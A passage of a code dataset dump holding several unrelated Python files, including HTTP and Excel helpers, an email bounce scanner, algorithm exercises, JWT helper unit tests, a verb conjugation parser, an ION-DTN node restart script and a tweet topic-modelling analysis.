os.path.exists(r\"../log/logPic/{}\".format(date)):\n os.makedirs(r\"../log/logPic/{}\".format(date))\n currentTime = time.strftime(\"%Y-%m-%d %H-%M-%S\", time.localtime())\n img.save(r\"../log/logPic/{}/{}-{}.jpg\".format(date,info,currentTime))\n\n\nclass ParseExcel(object):\n def __init__(self, file_path):\n self.data = xlrd.open_workbook(file_path)\n\n def getsheet(self, sheetname):\n return self.data.sheet_by_name(sheetname)\n\n @classmethod\n def getdatafromexcel(cls, file_path, sheetname, xrow, ycol):\n \"\"\"文件路径比较重要,要以这种方式去写文件路径不用\"\"\"\n # file_path = r'd:/功率因数.xlsx'\n # 读取的文件路径\n # file_path = file_path.decode('utf-8')\n # 文件中的中文转码\n data = xlrd.open_workbook(file_path)\n # 获取数据\n table = data.sheet_by_name(sheetname)\n # 获取sheet\n # nrows = table.nrows\n # # 获取总行数\n # ncols = table.ncols\n # 获取总列数\n # table.row_values(i)\n # # 获取一行的数值\n # table.col_values(i)\n # 获取一列的数值\n\n # 获取一个单元格的数值\n cell_value = table.cell(xrow, ycol).value\n\n return cell_value\n\n\nclass WebRequests:\n @staticmethod\n def get(url, para, headers):\n try:\n r = requests.get(url, params=para, headers=headers)\n print(\"获取返回的状态码\", r.status_code)\n json_r = r.json()\n print(\"json类型转化成python数据类型\", json_r)\n return json_r\n except BaseException as e:\n print(\"请求失败!\", str(e))\n\n @staticmethod\n def post(url, para, headers):\n try:\n r = 
requests.post(url, data=para, headers=headers)\n print(\"获取返回的状态码\", r.status_code)\n json_r = r.json()\n print(\"json类型转化成python数据类型\", json_r)\n return json_r\n except BaseException as e:\n print(\"请求失败!\", str(e))\n\n @staticmethod\n def post_json(url, para, headers):\n try:\n data = para\n data = json.dumps(data) # python数据类型转化为json数据类型\n r = requests.post(url, data=data, headers=headers)\n print(\"获取返回的状态码\", r.status_code)\n # print(\"返回值\", r.content.decode(\"utf-8\"))\n json_r = r.json()\n print(\"json类型转化成python数据类型\", json_r)\n return json_r\n except BaseException as e:\n print(\"请求失败!\", str(e))\n\n\nif __name__ == \"__main__\":\n pass\n log(123)","repo_name":"MM1997/layoutRoom_7.5","sub_path":"lib/public.py","file_name":"public.py","file_ext":"py","file_size_in_byte":7725,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"5491746212","text":"import os\nimport logging\n\nfrom flufl.bounce.interfaces import IBounceDetector\nfrom importlib import import_module\nfrom pkg_resources import resource_listdir\nfrom public import public\n\n\nlog = logging.getLogger('flufl.bounce')\n\n\ndef _find_detectors(package):\n missing = object()\n for filename in resource_listdir(package, ''):\n basename, extension = os.path.splitext(filename)\n if extension != '.py':\n continue\n module_name = '{}.{}'.format(package, basename)\n module = import_module(module_name)\n for name in getattr(module, '__all__', []):\n component = getattr(module, name, missing)\n if component is missing:\n log.error('skipping missing __all__ entry: {}'.format(name))\n if IBounceDetector.implementedBy(component):\n yield component\n\n\n@public\ndef scan_message(msg):\n \"\"\"Detect the set of all permanently bouncing original recipients.\n\n :param msg: The bounce message.\n :type msg: `email.message.Message`\n :return: The set of detected original recipients.\n :rtype: set of strings\n \"\"\"\n permanent_failures = set()\n package = 'flufl.bounce._detectors'\n for detector_class in _find_detectors(package):\n log.info('Running detector: {}'.format(detector_class))\n try:\n temporary, permanent = detector_class().process(msg)\n except Exception:\n log.exception('Exception in detector: {}'.format(detector_class))\n raise\n permanent_failures.update(permanent)\n return permanent_failures\n\n\n@public\ndef all_failures(msg):\n \"\"\"Detect the set of all bouncing original recipients.\n\n :param msg: The bounce message.\n :type msg: `email.message.Message`\n :return: 2-tuple of the temporary failure set and permanent failure set.\n :rtype: (set of strings, set of string)\n \"\"\"\n temporary_failures = set()\n permanent_failures = set()\n package = 'flufl.bounce._detectors'\n for detector_class in _find_detectors(package):\n log.info('Running detector: {}'.format(detector_class))\n temporary, permanent = detector_class().process(msg)\n temporary_failures.update(temporary)\n permanent_failures.update(permanent)\n return temporary_failures, permanent_failures\n","repo_name":"Riyuzakii/GNUmailman","sub_path":"venv3/lib/python3.5/site-packages/flufl.bounce-3.0-py3.5.egg/flufl/bounce/_scan.py","file_name":"_scan.py","file_ext":"py","file_size_in_byte":2297,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"12120471043","text":"'''\n给定一个 n x n 矩阵,其中每行和每列元素均按升序排序,找到矩阵中第k小的元素。\n请注意,它是排序后的第k小元素,而不是第k个元素。\n示例:\n\nmatrix = [\n [ 1, 5, 9],\n [10, 11, 13],\n [12, 13, 15]\n],\nk = 8,\n返回 
13。\n'''\n思路:二分查找的思想:初始时,最小值为第一个元素l,最大值为最后一个元素h,\n中值mid=(l+h)//2,统计矩阵中小于等于mid的元素个数count,即mid是第count小的数\n当count>=k时,第k小的数在[l, mid]内,令h=mid;否则在(mid, h]内,令l=mid+1\n'''\nclass Solution:\n    def kthSmallest(self, matrix, k):\n        n = len(matrix)\n        l, h = matrix[0][0], matrix[-1][-1]\n        while l < h:\n            mid = (l + h) // 2\n            count, j = 0, n - 1\n            for i in range(n):\n                while j >= 0 and matrix[i][j] > mid:\n                    j -= 1\n                count += j + 1\n            #print(count, k)\n            if count >= k:\n                h = mid\n            else:\n                l = mid + 1\n        return l","repo_name":"zhudaxia666/shuati","sub_path":"LeetCode/刷题/378有序矩阵中第k小的元素.py","file_name":"378有序矩阵中第k小的元素.py","file_ext":"py","file_size_in_byte":1166,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
{"seq_id":"12735031292","text":"import re\nimport string\n\n\ndef preprocess_text(text):\n    # Remove links\n    text = re.sub(r\"http\\S+\", \"\", text)\n\n    # remove special chars and numbers\n    text = re.sub(\"[^A-Za-z]+\", \" \", text)\n\n    text = text.strip().lower()\n    text = re.sub(\n        f\"[{re.escape(string.punctuation)}]\", \"\", text\n    )\n    return text","repo_name":"sangramdhurve/FastText-TextClassification","sub_path":"fasttext_api/api/data_preprocessing.py","file_name":"data_preprocessing.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
{"seq_id":"7495928023","text":"import copy\nimport sys\nsys.setrecursionlimit(10**9)\n\nN = int(input())\n\narrr = [[0] * N for _ in range(N)]\ndx = [1, 1, 1, 0, 0, -1, -1, -1]\ndy = [1, 0, -1, 1, -1, 1, 0, -1]\n\ndef func(tmp, n):\n    for nx, ny in tmp:\n        arr[nx][ny] = n\n\ndef DFS(queen):\n    global cnt\n    x, y = queen\n    arr[x][y] = 2\n    tmp = []\n\n    for m in range(1, N):\n        for k in range(8):\n            nx, ny = x + (dx[k] * m), y + (dy[k] * m)\n            if 0 <= nx < N and 0 <= ny < N and arr[nx][ny] == 0:\n                tmp.append([nx, ny])\n\n    func(tmp, 1)\n    for i in range(N):\n        if x != N-1 and arr[x+1][i] == 0:\n            DFS([x+1, i])\n\n    if sum(map(sum, arr)) == N * N + N:\n        cnt += 1\n\n    func(tmp, 0)\n    arr[x][y] = 0\n\ncnt = 0\nif N % 2 == 0:  # even\n    for i in range(N // 2):\n        arr = copy.deepcopy(arrr)\n        DFS([0, i])\n    print(cnt * 2)\n\nelse:  # odd\n    for i in range(N // 2):\n        arr = copy.deepcopy(arrr)\n        DFS([0, i])\n    cnt = cnt * 2\n    DFS([0, N//2])\n    print(cnt)\n","repo_name":"YooKyungHun/Algorithm","sub_path":"ALGORITHM/Python/9663N-Queen.py","file_name":"9663N-Queen.py","file_ext":"py","file_size_in_byte":1018,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
{"seq_id":"74909839799","text":"import unittest\nimport jwt\nimport json\nimport base64\nimport sys\nimport os\n\nimport osbtlib.id_token as id_token\n\nclass TestUtils(unittest.TestCase):\n    def test_get_header(self):\n        # create id_token\n        original_header = {'alg': 'HS256', 'typ': 'JWT'}\n        secret = 'secret'\n        original_token = jwt.encode({'foo': 'bar'}, secret, algorithm='HS256', headers=original_header)\n\n        header = id_token.get_header(original_token)\n        self.assertDictEqual(header, original_header)\n\n    def test_replace_header(self):\n        # create id_token\n        original_header = {'alg': 'HS256', 'typ': 'JWT'}\n        secret = 'secret'\n        original_token = jwt.encode({'foo': 'bar'}, secret, algorithm='HS256', headers=original_header)\n\n        # replace original header with new header\n        new_header = {'alg': 'HS256', 'typ': 'JWS'}\n        new_token = id_token.replace_header(original_token, new_header)\n\n        # decode header part\n        header_decoded = id_token.get_header(new_token)\n\n        self.assertDictEqual(header_decoded, new_header)\n\n    def test_get_payload(self):\n        # create id_token\n        original_payload = {'foo': 'bar'}\n        secret = 'secret'\n        original_token = jwt.encode(original_payload, secret, algorithm='HS256')\n\n        payload = id_token.get_payload(original_token)\n
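        # (Illustrative aside, not part of the osbtlib suite: splicing a new
        # payload into a token while keeping the old signature, the kind of
        # tampering these helpers enable, fails verification until the token
        # is re-signed. Uses only PyJWT calls; names are local to this sketch.)
        import jwt as _jwt
        _t1 = _jwt.encode({'foo': 'bar'}, secret, algorithm='HS256')
        _t2 = _jwt.encode({'baz': 'qux'}, secret, algorithm='HS256')
        _forged = '.'.join([_t1.split('.')[0], _t2.split('.')[1], _t1.split('.')[2]])
        try:
            _jwt.decode(_forged, secret, algorithms=['HS256'])
        except _jwt.InvalidSignatureError:
            pass  # expected: the HS256 signature no longer covers the payload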
self.assertEqual(payload.get('foo'), 'bar')\n\n def test_replace_payload(self):\n # create id_token\n original_payload = {'foo': 'bar'}\n secret = 'secret'\n original_token = jwt.encode(original_payload, secret, algorithm='HS256')\n \n # replace original payload with new payload\n new_payload = {'baz': 'qux'}\n new_token = id_token.replace_payload(original_token, new_payload)\n \n # decode payload part\n payload_decoded = id_token.get_payload(new_token)\n \n self.assertDictEqual(payload_decoded, {'baz': 'qux'})\n\n def test_get_signature(self):\n # create id_token\n secret = 'secret'\n original_token = jwt.encode({'foo': 'bar'}, secret, algorithm='HS256')\n\n signature = id_token.get_signature(original_token)\n self.assertEqual(signature, original_token.split('.')[2])\n\n def test_replace_signature(self):\n # create id_token\n secret = 'secret'\n original_token = jwt.encode({'foo': 'bar'}, secret, algorithm='HS256')\n\n # replace original signature with new signature\n new_signature = 'new_signature'\n new_token = id_token.replace_signature(original_token, new_signature)\n \n signature = id_token.get_signature(new_token)\n \n self.assertEqual(signature, new_signature)\n","repo_name":"oidc-scenario-based-tester/osbtlib","sub_path":"tests/test_id_token.py","file_name":"test_id_token.py","file_ext":"py","file_size_in_byte":2696,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"72878980599","text":"\"\"\"\nMiscellaneous classes for supporting the package.\n\"\"\"\nimport math\nimport warnings\n\nimport numpy as np\nfrom scipy.stats import norm\n\nfrom casex import enums\n\n\nclass NormalDistributionParameters:\n \"\"\"Class for provide support for generating and using normal distributions.\n\n Parameters\n ----------\n mu : float, optional\n Mean of the normal distribution (the default is 0).\n sigma : float, optional\n Standard deviation of the normal distribution (the default is 1).\n wrapping_type : :class:`enums.Wrapping`, optional\n The wrapping type for mu. When set to `EWrapping.PI2PI`, mu is wrapped to the interval -:math:`\\pi` to\n :math:`\\pi` (the default is `EWrapping.NONE`).\n\n Attributes\n ----------\n input_set : float array\n The domain for the sampling (i.e. the input to the distribution, or the x axis values).\n output_set : float array\n The value set for the sampling (i.e. the output of the distribution, or the y axis values).\n mu : float, optional\n Mean of the normal distribution (the default is 0).\n sigma : float, optional\n Standard deviation of the normal distribution (the default is 1).\n wrapping_type : :class:`enums.Wrapping`, optional\n The wrapping type for mu. When set to `EWrapping.PI2PI`, mu is wrapped to the interval -:math:`\\pi` to\n :math:`\\pi` (the default is `EWrapping.NONE`).\n \"\"\"\n\n def __init__(self, mu=0.0, sigma=1.0, wrapping_type=enums.Wrapping.NONE):\n self.input_set = None\n self.output_set = None\n\n self.mu = mu\n self.sigma = sigma\n \n self.__reset_values()\n\n if not isinstance(wrapping_type, enums.Wrapping):\n warnings.warn(\"Wrapping type not recognized. 
Wrapping set to NONE.\")\n self.wrapping_type = enums.Wrapping.NONE\n else:\n self.wrapping_type = wrapping_type\n \n if self.wrapping_type == enums.Wrapping.PI2PI:\n while self.mu > math.pi:\n self.mu = self.mu - 2 * math.pi\n while self.mu < -math.pi:\n self.mu = self.mu + 2 * math.pi\n \n def __reset_values(self):\n # Resets the input and output sets.\n self.input_set = None\n self.output_set = None\n \n def compute_sampling(self, times_sigma, num_of_samples):\n \"\"\"Computes a sampling of the normal distribution.\n\n The normal distribution can be plotted using output set against input set. This method computes the input set\n as a linear function and the output set as the normal distribution from the input set. Both sets are parameters\n in the class.\n\n Parameters\n ----------\n times_sigma : float\n This value is multiplied onto sigma and the results plus/minus is the interval for the sampling.\n num_of_samples : int\n Number of samples in the sampling.\n \n Returns\n -------\n None\n \"\"\"\n self.input_set = np.linspace(self.mu - times_sigma * self.sigma, self.mu + times_sigma * self.sigma,\n num_of_samples)\n self.output_set = norm.pdf(self.input_set, self.mu, self.sigma)\n\n\nclass InitialSpeeds:\n \"\"\"Class for holding initial speeds for ballistic descent.\n\n Parameters\n ----------\n initial_speed_x_mu : float\n [m/s] The mean value of the normal distribution for the initial horizontal speed.\n initial_speed_x_sigma : float\n The standard deviation of the normal distribution for the initial horizontal speed.\n initial_speed_y_mu : float\n [m/s] The mean value of the normal distribution for the initial vertical speed.\n initial_speed_y_sigma : float\n The standard deviation of the normal distribution for the initial vertical speed.\n\n Attributes\n ----------\n initial_speed_x : float\n [m/s] The initial horizontal speed.\n initial_speed_y : float\n [m/s] The initial vertical speed.\n \"\"\"\n\n def __init__(self, initial_speed_x_mu, initial_speed_x_sigma, initial_speed_y_mu, initial_speed_y_sigma):\n if initial_speed_x_mu < 0:\n warnings.warn(\"Initial horizontal speed (along x axis) cannot be negative. 
Subsequent results are invalid.\")\n \n self.initial_speed_x = NormalDistributionParameters(initial_speed_x_mu, initial_speed_x_sigma)\n self.initial_speed_y = NormalDistributionParameters(initial_speed_y_mu, initial_speed_y_sigma)\n","repo_name":"JARUS-QM/casex","sub_path":"casex/misc.py","file_name":"misc.py","file_ext":"py","file_size_in_byte":4500,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"} +{"seq_id":"36126687559","text":"import sys\ninput = sys.stdin.readline\n\ndx = [1,0,-1,0]\ndy = [0,-1,0,1]\nN, T = map(int,input().split())\norder = [list(map(str,input().split())) for _ in range(N)]\ndirection = [0,0]\ntmp, pre = 0, 0\nfor i in order:\n cnt = int(i[0]) - pre\n pre = int(i[0])\n direction[0] += dx[tmp]*cnt\n direction[1] += dy[tmp]*cnt\n if i[1][0] == 'r':\n tmp += 1\n else:\n tmp += 3\n tmp %= 4\ndirection[0] += dx[tmp]*(T-pre)\ndirection[1] += dy[tmp]*(T-pre)\nprint(direction[0], direction[1])\n","repo_name":"Darkeroe/Algorithm","sub_path":"20493.py","file_name":"20493.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"70580152121","text":"# -*- coding: utf-8 -*-\n\nfrom __future__ import print_function\n\nfrom bisect import bisect_left\n\nfrom lxml import etree\n\nfrom pkg_resources import resource_filename\n\nfrom . import string_utils\nfrom . import verb\nfrom . import exceptions\nfrom . import mlconjug\nfrom . import config\n\nclass VerbsParser:\n def __init__(self, lang='fr'):\n self.verbs = []\n parser = etree.XMLParser(encoding='utf-8')\n tree = etree.parse(resource_filename(\n \"verbecc\",\n \"data/verbs-{}.xml\".format(lang)),\n parser)\n root = tree.getroot()\n root_tag = 'verbs-{}'.format(lang)\n if root.tag != root_tag:\n raise exceptions.VerbsParserError(\n \"Root XML Tag {} Not Found\".format(root_tag))\n for child in root:\n if child.tag == 'v':\n self.verbs.append(verb.Verb(child))\n\n self.verbs = sorted(self.verbs, key=lambda v: v.infinitive)\n self._infinitives = [v.infinitive for v in self.verbs]\n self._verbs_no_accents = sorted(self.verbs, key=lambda v: v.infinitive_no_accents)\n self._infinitives_no_accents = [v.infinitive_no_accents for v in self._verbs_no_accents]\n if config.ml:\n self.template_predictor = mlconjug.TemplatePredictor(\n [(v.infinitive,v.template) for v in self.verbs], lang)\n\n def find_verb_by_infinitive(self, infinitive):\n \"\"\"First try to find with accents, e.g. if infinitive is 'Abañar',\n search for 'abañar' and not 'abanar'. 
\n If not found then try searching with accents stripped.\n If all else fails, use machine-learning magic to predict\n which conjugation template should be used.\n \"\"\"\n query = infinitive.lower()\n i = bisect_left(self._infinitives, query)\n if i != len(self._infinitives) and self._infinitives[i] == query:\n return self.verbs[i]\n query = string_utils.strip_accents(infinitive.lower())\n i = bisect_left(self._infinitives_no_accents, query)\n if (i != len(self._infinitives_no_accents) \n and self._infinitives_no_accents[i] == query):\n return self._verbs_no_accents[i]\n if config.ml:\n template, pred_score = self.template_predictor.predict(query)\n verb_xml = \"{}{}\".format(infinitive.lower(), template)\n ret = verb.Verb(etree.fromstring(verb_xml))\n ret.predicted = True\n ret.pred_score = pred_score\n return ret\n else:\n raise exceptions.VerbNotFoundError\n\n def get_verbs_that_start_with(self, pre, max_results=10):\n ret = []\n pre_no_accents = string_utils.strip_accents(pre.lower())\n for verb in self.verbs:\n if verb.infinitive_no_accents.startswith(pre_no_accents):\n ret.append(verb.infinitive)\n if len(ret) >= max_results:\n break\n return ret\n","repo_name":"bretttolbert/verbecc","sub_path":"verbecc/verbs_parser.py","file_name":"verbs_parser.py","file_ext":"py","file_size_in_byte":3009,"program_lang":"python","lang":"en","doc_type":"code","stars":64,"dataset":"github-code","pt":"40"} +{"seq_id":"26928111420","text":"import sys\nimport time\nimport requests\nimport subprocess\nfrom subprocess import PIPE\nimport datetime\n\nMGR_API_URL = \"https://www.spatiam.com/ion-dtn-mgr/api/\"\nCONFIG_FILENAME = \"spatiam_config.txt\"\n\nAUTH_TOKEN = sys.argv[1]\nNETWORK_ID = sys.argv[4]\nNODE_UUID = sys.argv[5]\nNODE_LISTENING_IP = sys.argv[6]\n\nnode_update = datetime.datetime.fromisoformat(sys.argv[2] + ' ' + sys.argv[3])\n\nprint(\"SPATIAM PERSISTENCE SCRIPT\")\nprint(\"The provided node will restart if any network updates are detected\")\nprint(\"\\nChecking for updates ...\")\n\n# ---------------------------------------------------------------\n# ion_alive: Checks bplist return code to check if ION is running\n# ---------------------------------------------------------------\ndef ion_alive():\n command = \"bplist\"\n proc = subprocess.Popen([command], shell=True, stdout=subprocess.PIPE)\n proc.communicate()\n return proc.returncode == 0\n\n# ---------------------------------------------------------------\n# ionrestart: Starts ION, stops it first if it is already running\n# ---------------------------------------------------------------\ndef ionrestart():\n print(\"Restarting ION ...\")\n\n failed_restart = 1\n while True:\n \n if failed_restart >= 3:\n print(\"ION failed to respond, exiting program\")\n quit()\n\n if ion_alive():\n ionstop_command = 'ionstop'\n subprocess.Popen([ionstop_command], shell=True, stdout=PIPE, stderr=PIPE).wait()\n time.sleep(2)\n\n ionstart_command = 'ionstart -I ' + CONFIG_FILENAME\n subprocess.Popen([ionstart_command], shell=True, stdout=PIPE, stderr=PIPE).wait()\n time.sleep(5)\n\n if not ion_alive():\n failed_restart += 1\n else:\n print(\"ION Successfully restarted\")\n break\n\n# ----------------------------------------------------------\n# download_config: Download configuration file of given node\n# ----------------------------------------------------------\ndef download_config():\n try:\n r = requests.get(MGR_API_URL + 'dynamic-config', params={'node': NODE_UUID, 'listeningip': NODE_LISTENING_IP, 'length':315360000})\n\n if r.status_code == 200:\n 
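            # (Aside, illustrative sketch: the bisect_left exact-match idiom
            # from the verbs_parser record above, inlined standalone; the names
            # below are examples for this sketch, not the verbecc API.)
            from bisect import bisect_left
            _infinitives = ['aller', 'manger', 'parler']   # must be pre-sorted
            _i = bisect_left(_infinitives, 'manger')
            # a hit requires both an in-range index and an exact string match;
            # otherwise the caller falls back to an accent-stripped search
            assert _i != len(_infinitives) and _infinitives[_i] == 'manger'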
config = r.text\n # Update only if config file has changed (network could be reporting 'cosmetic' change)\n if not config == open(CONFIG_FILENAME).read():\n try:\n print(\"Network update detected (\" + str(datetime.datetime.now())+\")\")\n config_file = open(CONFIG_FILENAME, \"w\")\n config_file.write(config)\n config_file.close()\n print(\"Node configuration downloaded (\" +CONFIG_FILENAME +\")\")\n ionrestart()\n print(\"\\nChecking for updates...\")\n return True\n except Exception as e:\n print(e)\n return False\n else:\n return True\n else:\n return False\n\n except:\n return False\n\n# -----------------------------------------------------------------\n# latest_network_update: Returns timestamp of latest network update\n# -----------------------------------------------------------------\ndef latest_network_update():\n try:\n r = requests.get(MGR_API_URL + 'api/network/'+NETWORK_ID+'/last_change', headers = {'Authorization': 'Token ' + AUTH_TOKEN})\n if r.status_code == 200:\n return datetime.datetime.fromisoformat(r.text)\n else:\n return None\n except:\n return None\n\nwhile True:\n latest_update = latest_network_update()\n \n # Network has had an update \n if latest_update is not None and latest_update > node_update:\n if download_config():\n node_update = latest_update\n\n # In case ION stops working\n elif not ion_alive():\n print(\"ION failure detected (\" + str(datetime.datetime.now()) + \")\")\n ionrestart()\n \n time.sleep(10)\n","repo_name":"Spatiam/Spatiam_ION_DMI","sub_path":"spatiam_persist.py","file_name":"spatiam_persist.py","file_ext":"py","file_size_in_byte":4017,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"29849954451","text":"#Sentiment analysis on the T-mobile sprint merger user comment data scraped from Twitter\r\n\r\nimport os\r\nimport pandas as pd\r\nimport numpy as np\r\nimport requests\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.common.keys import Keys\r\nimport nltk\r\nimport regex as re\r\nfrom nltk.stem import PorterStemmer\r\nimport wordcloud\r\nimport matplotlib.pyplot as plt\r\nfrom wordcloud import WordCloud, STOPWORDS\r\n#nltk.download('punkt')\r\n#nltk.download('averaged_perceptron_tagger')\r\n#nltk.download('maxent_ne_chunker')\r\n#nltk.download('words')\r\n\r\nfrom nltk import word_tokenize, pos_tag, ne_chunk\r\nfrom nltk.chunk import conlltags2tree, tree2conlltags\r\n\r\n#upload the data\r\nos.getcwd()\r\n\r\nos.chdir('D:\\\\MSIS(R and Python)\\\\Project')\r\n\r\nmerger_tweets = pd.read_table('cleanfile2.csv', sep = ',')\r\nmerger_tweets.head()\r\ntextbank = merger_tweets.tweet.str.cat(sep=' ')\r\n\r\n#tokenizing the words\r\npost1 = pos_tag(word_tokenize(textbank))\r\nprint(post1)\r\n\r\ntree1 = ne_chunk(post1)\r\nprint(tree1)\r\n\r\nentityp = []\r\nentityo = []\r\nentityg = []\r\nentitydesc = []\r\n\r\n#named entity recognition for person, organization, geographical location\r\nfor x in str(tree1).split('\\n'):\r\n if 'PERSON' in x:\r\n entityp.append(x)\r\n elif 'ORGANIZATION' in x:\r\n entityo.append(x)\r\n elif 'GPE' in x or 'GSP' in x:\r\n entityg.append(x)\r\n elif '/NN' in x:\r\n entitydesc.append(x)\r\n\r\nentityp\r\nentityo\r\nentityg\r\nentitydesc\r\n\r\niob_tag = tree2conlltags(tree1)\r\nprint(iob_tag)\r\n\r\nentityp1 = re.sub(r'/NNP','', str(entityp))\r\nentityp1 = re.sub(r'/NNPS','', entityp1)\r\nentityp1 = re.sub(r'/JJ','', entityp1)\r\nentityp1 = re.sub(r'GPE','', entityp1)\r\nentityp1 = re.sub(r'PERSON','', entityp1)\r\nentityp1 = re.sub(r'NN','', 
entityp1)\r\nfrom PIL import Image\r\nfrom os import path\r\n#To make word cloud in the shape of twitter symbol. The png is just a black and white twitter icon\r\n#named entity - person\r\nd = path.dirname(__file__) if \"__file__\" in locals() else os.getcwd()\r\nperson_mask = np.array(Image.open(path.join(d, \"download (1).png\")))\r\nstopwords = set(STOPWORDS)\r\nwordcloud = WordCloud(\r\n background_color='white',\r\n stopwords=stopwords,\r\n max_words=500,\r\n mask = person_mask,\r\n max_font_size=40, \r\n scale=3,\r\n ).generate(str(entityp1))\r\n\r\nplt.figure(1, figsize=(12, 12))\r\nplt.axis('off')\r\n \r\nplt.imshow(wordcloud)\r\nplt.show()\r\n\r\n#named entity - Organization\r\nentityo1 = re.sub(r'/NNP','', str(entityo))\r\nentityo1 = re.sub(r'/NNPS','', entityo1)\r\nentityo1 = re.sub(r'/JJ','', entityo1)\r\nentityo1 = re.sub(r'GPE','', entityo1)\r\nentityo1 = re.sub(r'ORGANIZATION','', entityo1)\r\norganization_mask = np.array(Image.open(path.join(d, \"download (1).png\")))\r\nstopwords = set(STOPWORDS)\r\nwordcloud = WordCloud(\r\n background_color='white',\r\n stopwords=stopwords,\r\n max_words=200,\r\n max_font_size=40,\r\n mask = organization_mask,\r\n scale=3,\r\n ).generate(str(entityo1))\r\n\r\nplt.figure(1, figsize=(12, 12))\r\nplt.axis('off')\r\n \r\nplt.imshow(wordcloud)\r\nplt.show()\r\n\r\n#named entity - Geographical location\r\nentityg1 = re.sub(r'/NNP','', str(entityg))\r\nentityg1 = re.sub(r'/NNPS','', entityg1)\r\nentityg1 = re.sub(r'/JJ','', entityg1)\r\nentityg1 = re.sub(r'GPE','', entityg1)\r\nentityg1 = re.sub(r'GSP','', entityg1)\r\nentityg1 = re.sub(r'/NN','', entityg1)\r\ngeography_mask = np.array(Image.open(path.join(d, \"download.png\")))\r\nstopwords = set(STOPWORDS)\r\nwordcloud = WordCloud(\r\n background_color='white',\r\n stopwords=stopwords,\r\n max_words=200,\r\n max_font_size=40,\r\n mask = geography_mask,\r\n scale=3,\r\n ).generate(str(entityg1))\r\n\r\nplt.figure(1, figsize=(12, 12))\r\nplt.axis('off')\r\n \r\nplt.imshow(wordcloud)\r\nplt.show()\r\n\r\n\r\n\r\nimport nltk\r\n\r\n# download the stopwords dictionary if you have not already\r\n\r\n#nltk.download('stopwords')\r\n\r\nfrom nltk import word_tokenize, sent_tokenize\r\n\r\nfrom nltk.corpus import stopwords\r\n\r\nfrom nltk.stem import LancasterStemmer, WordNetLemmatizer, PorterStemmer\r\n\r\nmerger_tweets.columns\r\n\r\nmerger_tweets.rename(columns={'tweet': 'tweettext'}, inplace=True)\r\n\r\nmerger_tweets['tweettext'] = merger_tweets['tweettext'].apply(lambda x: \" \".join(x.lower() for x in x.split()))\r\n\r\nmerger_tweets['tweettext'][2]\r\n\r\n#removal of digits and unnecessary words\r\npatterndigits = '\\\\b[0-9]+\\\\b'\r\n\r\nmerger_tweets['tweettext'] = merger_tweets['tweettext'].str.replace(patterndigits,'')\r\n\r\npatternpunc = '[^\\w\\s]'\r\n\r\nmerger_tweets['tweettext'] = merger_tweets['tweettext'].str.replace(patternpunc,'')\r\n\r\n\r\nmerger_tweets['tweettext'][2]\r\n\r\nstop = stopwords.words('english')\r\n\r\n# Before removal of stopwords\r\n\r\nmerger_tweets['tweettext'][2]\r\n\r\nmerger_tweets['tweettext'] = merger_tweets['tweettext'].apply(lambda x: \" \".join(x for x in x.split() if x not in stop))\r\n\r\n# After removal of stopwords\r\n\r\nmerger_tweets['tweettext'][2]\r\n\r\nnetwork_names = ['sprint','tmobile','sprinttmobilemerger','tmobilesprintmerger','sprintmerger','tmobilemerger'] \r\n\r\nmerger_tweets['tweettext'] = merger_tweets['tweettext'].apply(lambda x: \" \".join(x for x in x.split() if x not in network_names))\r\n\r\nporstem = 
PorterStemmer()\r\n\r\nmerger_tweets['tweettext'] = merger_tweets['tweettext'].apply(lambda x: \" \".join([porstem.stem(word) for word in x.split()]))\r\n\r\nmerger_tweets['tweettext'][2]\r\n\r\nfrom sklearn.feature_extraction.text import CountVectorizer\r\n\r\nvectorizer = CountVectorizer()\r\n\r\ntokens_data = pd.DataFrame(vectorizer.fit_transform(merger_tweets['tweettext']).toarray(), columns=vectorizer.get_feature_names())\r\n\r\nfrom sklearn.feature_extraction.text import CountVectorizer\r\n\r\nfrom sklearn.decomposition import LatentDirichletAllocation\r\n\r\nfrom sklearn.feature_extraction.text import TfidfVectorizer\r\n\r\nfrom sklearn.decomposition import NMF\r\n\r\n \r\n\r\nfrom sklearn.model_selection import train_test_split\r\n\r\nfrom sklearn.ensemble import RandomForestClassifier\r\n\r\nfrom sklearn.metrics import classification_report, confusion_matrix, accuracy_score\r\n\r\n#plot_size = plt.rcParams[\"figure.figsize\"]\r\n\r\n#print(plot_size[0])\r\n\r\n#print(plot_size[1])\r\n\r\n\r\n#plot_size[0] = 8\r\n\r\n#plot_size[1] = 6\r\n\r\n#plt.rcParams[\"figure.figsize\"] = plot_size\r\n\r\n#Creation of topics\r\n\r\nvectorizer = CountVectorizer(max_df=0.8, min_df=4, stop_words='english')\r\n\r\ndoc_term_matrix = vectorizer.fit_transform(merger_tweets['tweettext'].values.astype('U'))\r\n\r\ndoc_term_matrix\r\n\r\nLDA = LatentDirichletAllocation(n_components=5, random_state=35)\r\n\r\nLDA.fit(doc_term_matrix)\r\n\r\nfirst_topic = LDA.components_[0]\r\n\r\n#first topic top words\r\ntop_topic_words = first_topic.argsort()[-10:]\r\n\r\n\r\nfor i in top_topic_words:\r\n\r\n print(vectorizer.get_feature_names()[i]) \r\n\r\n\r\nfor i,topic in enumerate(LDA.components_):\r\n\r\n print(f'Top 10 words for topic #{i}:')\r\n\r\n print([vectorizer.get_feature_names()[i] for i in topic.argsort()[-10:]])\r\n\r\n print('\\n')\r\n\r\n#document term matrix\r\ntopic_values = LDA.transform(doc_term_matrix)\r\n\r\ntopic_values.shape\r\n\r\nmerger_tweets['topic'] = topic_values.argmax(axis=1)\r\n\r\nmerger_tweets.head()\r\n\r\n\r\ntfidf_vect = TfidfVectorizer(max_df=0.8, min_df=5, stop_words='english')\r\n\r\ndoc_term_matrix2 = 